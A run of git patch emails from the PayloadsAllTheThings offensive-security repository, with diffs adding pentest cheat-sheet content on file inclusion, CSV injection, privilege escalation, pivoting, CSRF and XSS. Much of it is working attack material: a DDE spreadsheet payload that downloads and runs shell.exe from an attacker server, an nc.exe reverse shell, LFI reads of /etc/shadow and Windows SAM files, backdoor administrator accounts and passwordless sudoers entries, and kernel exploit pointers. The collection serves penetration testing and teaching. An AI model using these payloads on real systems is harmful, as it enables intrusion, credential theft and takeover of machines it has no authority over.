Escalation.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md) - [Metasploit - Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md) - - [Methodology_and_enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology_and_enumeration.md) + - [Methodology and enumeration.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Methodology%20and%20enumeration.md) - [Network Pivoting Techniques.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md) - [Network Discovery.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Discovery.md) - [Reverse Shell Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) From e8cd11f88fd80193584d4e6a704b6b089516be73 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 9 Jun 2019 18:13:15 +0200 Subject: [PATCH 005/222] plink + sshuttle : Network Pivoting Techniques --- File Inclusion/README.md | 5 +++ .../Network Pivoting Techniques.md | 34 +++++++++++++++++-- Upload Insecure Files/README.md | 22 ++++++++++++ 3 files changed, 58 insertions(+), 3 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 6c54db95..c6b17b15 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -6,6 +6,7 @@ ## Summary +* [Tools](#tools) * [Basic LFI](#basic-lfi) * [Null byte](#null-byte) * [Double encoding](#double-encoding) @@ -27,6 +28,10 @@ * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file) * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions) +## Tools + +* [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) + ## Basic LFI In the following examples we include the `/etc/passwd` file, check the `Directory & Path Traversal` chapter for more interesting files. diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index a9d182f1..e35bc19f 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -1,5 +1,25 @@ # Network Pivoting Techniques +## Summary + +* [Windows netsh Port Forwarding](#windows-netsh-port-forwarding) +* [SSH](#ssh) + * [SOCKS Proxy](#socks-proxy) + * [Local Port Forwarding](#local-port-forwarding) + * [Remote Port Forwarding](#remote-port-forwarding) +* [Proxychains](#proxychains) +* [Web SOCKS - reGeorg](#web-socks---regeorg) +* [Metasploit](#metasploit) +* [sshuttle](#sshuttle) +* [Rpivot](#rpivot) +* [plink](#plink) +* [ngrok](#ngrok) +* [Basic Pivoting Types](#basic-pivoting-types) + * [Listen - Listen](#listen---listen) + * [Listen - Connect](#listen---connect) + * [Connect - Connect](#connect---connect) +* [References](#references) + ## Windows netsh Port Forwarding ```powershell @@ -94,6 +114,13 @@ run autoroute -s 192.168.57.0/24 use auxiliary/server/socks4a ``` +## sshuttle + +```powershell +sshuttle -vvr user@10.10.10.10 10.1.1.0/24 +sshuttle -vvr username@pivot_host 10.2.2.0/24 +``` + ## Rpivot Server (Attacker box) @@ -128,6 +155,7 @@ python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro ```powershell plink -l root -pw toor ssh-server-ip -R 3390:127.0.0.1:3389 --> exposes the RDP port of the machine in the port 3390 of the SSH Server plink -l root -pw mypassword 192.168.18.84 -R +plink.exe -v -pw mypassword user@10.10.10.10 -L 6666:127.0.0.1:445 plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] ``` @@ -155,7 +183,7 @@ unzip ngrok-stable-linux-amd64.zip | Listen - Connect | Normal redirect. | | Connect - Connect | Can’t bind, so connect to bridge two hosts | -## Listen - Listen +### Listen - Listen | Type | Use Case | | :------------- | :------------------------------------------ | @@ -164,7 +192,7 @@ unzip ngrok-stable-linux-amd64.zip | remote host 1 | `ncat localhost 8080 < file` | | remote host 2 | `ncat localhost 9090 > newfile` | -## Listen - Connect +### Listen - Connect | Type | Use Case | | :------------- | :------------------------------------------ | @@ -173,7 +201,7 @@ unzip ngrok-stable-linux-amd64.zip | remote host 1 | `ncat localhost -p 8080 < file` | | remote host 2 | `ncat -l -p 9090 > newfile` | -## Connect - Connect +### Connect - Connect | Type | Use Case | | :------------- | :------------------------------------------ | diff --git a/Upload Insecure Files/README.md b/Upload Insecure Files/README.md index a95dcbb1..c9382fea 100644 --- a/Upload Insecure Files/README.md +++ b/Upload Insecure Files/README.md @@ -2,6 +2,19 @@ Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. +## Summary + +* [Tools](#tools) +* [Exploits](#exploits) + * [PHP Extension](#php-extension) + * [Other extensions](#other-extensions) + * [Upload tricks](#upload-tricks) + * [Picture upload with LFI](#picture-upload-with-lfi) + * [Configuration Files](#configuration-files) + * [CVE - Image Tragik](#cve---image-tragik) +* [References](#references) + + ## Tools - [Fuxploider](https://github.com/almandin/fuxploider) @@ -30,6 +43,15 @@ Double extensions .png.php ``` +### Other extensions + +```powershell +asp : .asp, .aspx +perl: .pl, .pm, .cgi, .lib +jsp : .jsp, .jspx, .jsw, .jsv, .jspf +Coldfusion: .cfm, .cfml, .cfc, .dbm +``` + ### Upload tricks - Null byte (eg: shell.php%00.gif, shell.php%00.png), works well against `pathinfo()` From 5d4f65720a9dffe82d4850ac98f5ad1581a4658a Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 9 Jun 2019 20:53:41 +0200 Subject: [PATCH 006/222] PrivEsc - Common Exploits --- CSV Injection/README.md | 8 ++++ .../Linux - Privilege Escalation.md | 44 +++++++++++++++++++ .../Methodology and enumeration.md | 12 +++++ .../Windows - Privilege Escalation.md | 1 - .../Windows - Using credentials.md | 3 +- 5 files changed, 66 insertions(+), 2 deletions(-) diff --git a/CSV Injection/README.md b/CSV Injection/README.md index 126105d6..5261b09c 100644 --- a/CSV Injection/README.md +++ b/CSV Injection/README.md @@ -7,10 +7,18 @@ Many web applications allow the user to download content such as templates for i Basic exploit with Dynamic Data Exchange ```powershell +# pop a calc DDE ("cmd";"/C calc";"!A0")A0 @SUM(1+1)*cmd|' /C calc'!A0 + +# pop a notepad =cmd|' /C notepad'!'A1' + +# powershell download and execute =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 + +# msf smb delivery with rundll32 +=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1 ``` Technical Details of the above payload: diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 36820bcc..09af954d 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -43,6 +43,11 @@ * [Groups](#groups) * [Docker](#docker) * [LXC/LXD](#lxclxd) +* [Common Exploits](#common-exploits) + * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow) + * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds) + * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson) + * [CVE-2012-0056 (Mempodipper)](#CVE-2012-0056-mempodipper) ## Checklists @@ -537,6 +542,45 @@ lxc exec mycontainer /bin/sh Alternatively https://github.com/initstring/lxd_root + +## Common Exploits + +### CVE-2016-5195 (DirtyCow) + +Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 + +```powershell +# make dirtycow stable +echo 0 > /proc/sys/vm/dirty_writeback_centisecs +g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil +https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs +``` + +### CVE-2010-3904 (RDS) + +Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8 + +```powershell +https://www.exploit-db.com/exploits/15285/ +``` + +### CVE-2010-4258 (Full Nelson) + +Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) + +```powershell +https://www.exploit-db.com/exploits/15704/ +``` + +### CVE-2012-0056 (Mempodipper) + +Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) + +```powershell +https://www.exploit-db.com/exploits/18411 +``` + + ## References - [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) diff --git a/Methodology and Resources/Methodology and enumeration.md b/Methodology and Resources/Methodology and enumeration.md index 65cd22d2..8270db14 100644 --- a/Methodology and Resources/Methodology and enumeration.md +++ b/Methodology and Resources/Methodology and enumeration.md @@ -176,6 +176,18 @@ masscan -e tun0 -p1-65535,U:1-65535 10.10.10.97 --rate 1000 index: 0x8 Account: root Name: root Desc: (null) ``` +* Zone Transfer + + ```powershell + host -t ns domain.local + domain.local name server master.domain.local. + + host master.domain.local + master.domain.local has address 192.168.1.1 + + dig axfr domain.local @192.168.1.1 + ``` + ## List all the subdirectories and files * Using BFAC (Backup File Artifacts Checker): An automated tool that checks for backup artifacts that may disclose the web-application's source code. diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 5e820c0a..87852a24 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -603,7 +603,6 @@ $ computer = "" [System.Diagnostics.Process]::Start("C:\users\public\nc.exe"," 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer) ``` - ## EoP - Common Vulnerabilities and Exposure ### Token Impersonation (RottenPotato) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 0234bbbb..17f22cf5 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -5,7 +5,8 @@ ```powershell net user hacker hacker1234* /add net localgroup administrators hacker /add -net localgroup "Remote Desktop Users" hacker /add +net localgroup "Remote Desktop Users" hacker /add # RDP access +net localgroup "Backup Operators" hacker /add # Full access to files net group "Domain Admins" hacker /add /domain ``` From a85fa5af28c7ff47a5674d3fb4315c04d7d9a45a Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 10 Jun 2019 00:05:47 +0200 Subject: [PATCH 007/222] Local File Include : rce via mail + kadimus --- File Inclusion/README.md | 73 ++++++++++++++++++- .../Linux - Privilege Escalation.md | 9 ++- .../Windows - Privilege Escalation.md | 12 ++- 3 files changed, 85 insertions(+), 9 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index c6b17b15..25cd148f 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -27,6 +27,7 @@ * [LFI to RCE via phpinfo()](#lfi-to-rce-via-phpinfo) * [LFI to RCE via controlled log file](#lfi-to-rce-via-controlled-log-file) * [LFI to RCE via PHP sessions](#lfi-to-rce-via-php-sessions) +* [LFI to RCE via credentials files](#lfi-o-rce-via-credentials-files) ## Tools @@ -119,7 +120,12 @@ can be chained with a compression wrapper for large files. http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd ``` -NOTE: Wrappers can be chained : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s` +NOTE: Wrappers can be chained multiple times : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s` + +```powershell +./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page +curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php +``` ### Wrapper zip:// @@ -150,11 +156,16 @@ http://example.com/index.php?page=expect://ls ### Wrapper input:// -Specify your payload in the POST parameters +Specify your payload in the POST parameters, this can be done with a simple `curl` command. ```powershell -http://example.com/index.php?page=php://input -POST DATA: +curl -X POST --data "" "https://example.com/index.php?page=php://input%00" -k -v +``` + +Alternatively, Kadimus has a module to automate this attack. + +```powershell +./kadimus -u "https://example.com/index.php?page=php://input%00" -C '' -T input ``` ### Wrapper phar:// @@ -268,6 +279,35 @@ http://example.com/index.php?page=/usr/local/apache/log/error_log http://example.com/index.php?page=/usr/local/apache2/log/error_log ``` +### RCE via Mail + +First send an email using the open SMTP then include the log file located at `http://example.com/index.php?page=/var/log/mail`. + +```powershell +root@kali:~# telnet 10.10.10.10. 25 +Trying 10.10.10.10.... +Connected to 10.10.10.10.. +Escape character is '^]'. +220 straylight ESMTP Postfix (Debian/GNU) +helo ok +250 straylight +mail from: mail@example.com +250 2.1.0 Ok +rcpt to: root +250 2.1.5 Ok +data +354 End data with . +subject: +data2 +. +``` + +In some cases you can also send the email with the `mail` command line. + +```powershell +mail -s "" www-data@10.10.10.10. < /dev/null +``` + ## LFI to RCE via PHP sessions Check if the website use PHP Session (PHPSESSID) @@ -296,6 +336,31 @@ Use the LFI to include the PHP session file login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 ``` +## LFI to RCE via credentials files + +This method require high privileges inside the application in order to read the sensitive files. + +### Windows version + +First extract `sam` and `system` files. + +```powershell +http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam +http://example.com/index.php?page=../../../../../../WINDOWS/repair/system +``` + +Then extract hashes from these files `samdump2 SYSTEM SAM > hashes.txt`, and crack them with `hashcat/john` or replay them using the Pass The Hash technique. + +### Linux version + +First extract `/etc/shadow` files. + +```powershell +http://example.com/index.php?page=../../../../../../etc/shadow +``` + +Then crack the hashes inside in order to login via SSH on the machine. + ## References * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 09af954d..681ef8a9 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -43,7 +43,7 @@ * [Groups](#groups) * [Docker](#docker) * [LXC/LXD](#lxclxd) -* [Common Exploits](#common-exploits) +* [Kernel Exploits](#kernel-exploits) * [CVE-2016-5195 (DirtyCow)](#CVE-2016-5195-dirtycow) * [CVE-2010-3904 (RDS)](#[CVE-2010-3904-rds) * [CVE-2010-4258 (Full Nelson)](#CVE-2010-4258-full-nelson) @@ -542,8 +542,13 @@ lxc exec mycontainer /bin/sh Alternatively https://github.com/initstring/lxd_root +## Kernel Exploits -## Common Exploits +Precompiled exploits can be found inside these repositories, run them at your own risk ! +* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits) +* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/) + +The following exploits are known to work well. ### CVE-2016-5195 (DirtyCow) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 87852a24..bb4b6da2 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -94,7 +94,6 @@ List all users ```powershell net user -net user Swissky whoami /all Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name @@ -250,7 +249,7 @@ REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList ### Passwords in unattend.xml -Location of the unattend.xml files +Location of the unattend.xml files. ```powershell C:\unattend.xml @@ -265,7 +264,7 @@ Example content ```powershell - *SENSITIVE*DATA*DELETED* + U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo== true Administrateur @@ -281,6 +280,13 @@ Example content ``` +Unattend credentials are stored in base64 and can be decoded manually with base64. + +```powershell +$ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo=" | base64 -d +SecretSecurePassword1234* +``` + The Metasploit module `post/windows/gather/enum_unattend` looks for these files. ### IIS Web config From 94a60b43d683837523024845f19b97b1d984e201 Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 10 Jun 2019 11:00:54 +0200 Subject: [PATCH 008/222] Writable /etc/sudoers + Meterpreter autoroute --- .../Linux - Privilege Escalation.md | 15 +++++++++-- .../Network Pivoting Techniques.md | 27 ++++++++++++++++--- 2 files changed, 37 insertions(+), 5 deletions(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 681ef8a9..6afe24ea 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -7,7 +7,7 @@ ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t ``` - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) -- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://gist.github.com/sh1n0b1/e2e1a5f63fbec3706123) +- [linuxprivchecker.py - a Linux Privilege Escalation Check Script](https://github.com/sleventyeleven/linuxprivchecker) - [unix-privesc-check - Automatically exported from code.google.com/p/unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) ## Summary @@ -35,7 +35,8 @@ * [sudo_inject](#sudo-inject) * [GTFOBins](#gtfobins) * [Wildcard](#wildcard) -* [Writable /etc/passwd](#writable---etc---passwd) +* [Writable /etc/passwd](#writable-etcpasswd) +* [Writable /etc/sudoers](#writable-etcsudoers) * [NFS Root Squashing](#nfs-root-squashing) * [Shared Library](#shared-library) * [ldconfig](#ldconfig) @@ -399,6 +400,16 @@ su - dummy NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. +## Writable /etc/sudoers + +```powershell +echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers + +# use SUDO without password +echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers +``` + + ## NFS Root Squashing When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index e35bc19f..9ef65ace 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -103,15 +103,36 @@ optional arguments: ## Metasploit -```c -portfwd list +```powershell +# Meterpreter list active port forwards +portfwd list + +# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell +portfwd add –l 3389 –p 3389 –r target-host portfwd add -l 88 -p 88 -r 127.0.0.1 portfwd add -L 0.0.0.0 -l 445 -r 192.168.57.102 -p 445 +# Forwards 3389 (RDP) to 3389 on the compromised machine running the Meterpreter shell +portfwd delete –l 3389 –p 3389 –r target-host +# Meterpreter delete all port forwards +portfwd flush + or -run autoroute -s 192.168.57.0/24 +# Use Meterpreters autoroute script to add the route for specified subnet 192.168.15.0 +run autoroute -s 192.168.15.0/24 use auxiliary/server/socks4a + +# Meterpreter list all active routes +run autoroute -p + +route #Meterpreter view available networks the compromised host can access +# Meterpreter add route for 192.168.14.0/24 via Session number. +route add 192.168.14.0 255.255.255.0 3 +# Meterpreter delete route for 192.168.14.0/24 via Session number. +route delete 192.168.14.0 255.255.255.0 3 +# Meterpreter delete all routes +route flush ``` ## sshuttle From 8cec2e0ca3377c35d779ad60f92c5e99a3143f52 Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 10 Jun 2019 11:09:02 +0200 Subject: [PATCH 009/222] Linux PrivEsc - Writable files --- .../Linux - Privilege Escalation.md | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 6afe24ea..f46d0ea8 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -35,8 +35,9 @@ * [sudo_inject](#sudo-inject) * [GTFOBins](#gtfobins) * [Wildcard](#wildcard) -* [Writable /etc/passwd](#writable-etcpasswd) -* [Writable /etc/sudoers](#writable-etcsudoers) +* [Writable files](#writable-files) + * [Writable /etc/passwd](#writable-etcpasswd) + * [Writable /etc/sudoers](#writable-etcsudoers) * [NFS Root Squashing](#nfs-root-squashing) * [Shared Library](#shared-library) * [ldconfig](#ldconfig) @@ -369,8 +370,13 @@ tar cf archive.tar * Tool: [wildpwn](https://github.com/localh0t/wildpwn) +## Writable files -## Writable /etc/passwd +```powershell +find / -writable ! -user \`whoami\` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null +``` + +### Writable /etc/passwd First generate a password with one of the following commands @@ -400,7 +406,7 @@ su - dummy NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. -## Writable /etc/sudoers +### Writable /etc/sudoers ```powershell echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers From 24a05c7098812ed6ce46608ec0d0a3d17a610fa6 Mon Sep 17 00:00:00 2001 From: Dan Borges Date: Tue, 11 Jun 2019 11:51:09 -0700 Subject: [PATCH 010/222] Update Windows - Privilege Escalation.md --- Methodology and Resources/Windows - Privilege Escalation.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index bb4b6da2..e4f97a54 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -665,7 +665,7 @@ python ms08-067.py 10.0.0.1 6 445 ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) -Check if the patch is installed : `wmic qfe list | find "3139914"` +Check if the patch is installed : `wmic qfe list | findstr "3139914"` ```powershell Powershell: @@ -733,4 +733,4 @@ python2 send_and_execute.py 10.0.0.1 revshell.exe * [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/) * [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/) * [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/) -* [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/) \ No newline at end of file +* [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/) From 9745e67465492e7805ba3a9cf4aa5a4bd5361ae0 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 16 Jun 2019 23:45:52 +0200 Subject: [PATCH 011/222] HQL Injection + references update --- AWS Amazon Bucket S3/README.md | 2 + CSRF Injection/README.md | 28 +++++++--- CSV Injection/README.md | 5 +- File Inclusion/README.md | 1 + .../Active Directory Attack.md | 13 +++++ .../Network Pivoting Techniques.md | 12 +++++ .../Reverse Shell Cheatsheet.md | 9 +++- .../Windows - Privilege Escalation.md | 7 ++- SQL Injection/HQL Injection.md | 51 +++++++++++++++++++ Upload Insecure Files/README.md | 1 + XXE Injection/README.md | 50 +++++++++++++++--- 11 files changed, 160 insertions(+), 19 deletions(-) create mode 100644 SQL Injection/HQL Injection.md diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 10221757..8b7b51b7 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md @@ -192,3 +192,5 @@ For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws * [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/) * [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud) * [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/) +* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/) +* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/) \ No newline at end of file diff --git a/CSRF Injection/README.md b/CSRF Injection/README.md index 7deed48b..01a39fee 100644 --- a/CSRF Injection/README.md +++ b/CSRF Injection/README.md @@ -7,6 +7,17 @@ * [Methodology](#methodology) * [Payloads](#payloads) + * [HTML GET - Requiring User Interaction](#) + * [HTML GET - No User Interaction)](#) + * [HTML POST - Requiring User Interaction](#) + * [HTML POST - AutoSubmit - No User Interaction](#) + * [JSON GET - Simple Request](#) + * [JSON POST - Simple Request](#) + * [JSON POST - Complex Request](#) + +## Tools + +* [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe) ## Methodology @@ -16,19 +27,19 @@ When you are logged in to a certain site, you typically have a session. The identifier of that session is stored in a cookie in your browser, and is sent with every request to that site. Even if some other site triggers a request, the cookie is sent along with the request and the request is handled as if the logged in user performed it. -### HTML GET – Requiring User Interaction for Proof-of-Concept +### HTML GET - Requiring User Interaction ```html Click Me ``` -### HTML GET (No User Interaction) +### HTML GET - No User Interaction ```html ``` -### HTML POST – Requiring User Interaction for Proof-of-Concept +### HTML POST - Requiring User Interaction ```html

@@ -37,7 +48,7 @@ When you are logged in to a certain site, you typically have a session. The iden ``` -### HTML POST (AutoSubmit – No User Interaction) +### HTML POST - AutoSubmit - No User Interaction ```html
@@ -51,7 +62,7 @@ When you are logged in to a certain site, you typically have a session. The iden ``` -### JSON GET – Simple Request +### JSON GET - Simple Request ```html ``` -### JSON POST – Simple Request +### JSON POST - Simple Request ```html ``` -### JSON POST – Complex Request +### JSON POST - Complex Request ```html ]]> ``` -XSS in Markdown +### XSS in Markdown ```csharp [a](javascript:prompt(document.cookie)) @@ -306,7 +307,7 @@ XSS in Markdown [a](javascript:window.onerror=alert;throw%201) ``` -XSS in SWF flash application +### XSS in SWF flash application ```powershell Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); @@ -316,7 +317,7 @@ IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvali more payloads in ./files -XSS in SWF flash application +### XSS in SWF flash application ``` flashmediaelement.swf?jsinitfunctio%gn=alert`1` @@ -337,7 +338,7 @@ flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}// ``` -XSS in CSS +### XSS in CSS ```html @@ -356,6 +357,33 @@ div { ``` +## XSS in PostMessage + +> If the target origin is asterisk * the message can be sent to any domain has reference to the child page. + +```html + + + + + + + +``` + ## Blind XSS ### XSS Hunter @@ -1002,6 +1030,7 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett - [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html) +- [postMessage XSS on a million sites - December 15, 2016 - Mathias Karlsson](https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/) - [postMessage XSS Bypass](https://hackerone.com/reports/231053) - [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin - [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans @@ -1014,4 +1043,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/) - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) -- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) +- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) \ No newline at end of file From 66c9d945b74ea07ae4419e8743e30156f148c067 Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Tue, 6 Aug 2019 17:28:47 +0200 Subject: [PATCH 039/222] Update README.md --- XXE Injection/README.md | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index f94edd00..f3a3fafe 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -32,6 +32,11 @@ Syntax: `` ``` sudo ./xxeftp -uno 443 ./xxeftp -w -wps 5555 ``` + - [230-OOB](https://github.com/lc/230-OOB) and payload generation via [http://xxe.sh/](http://xxe.sh/) + ``` + $ python3 230.py 2121 + ``` + ## Detect the vulnerability @@ -306,4 +311,4 @@ GIF 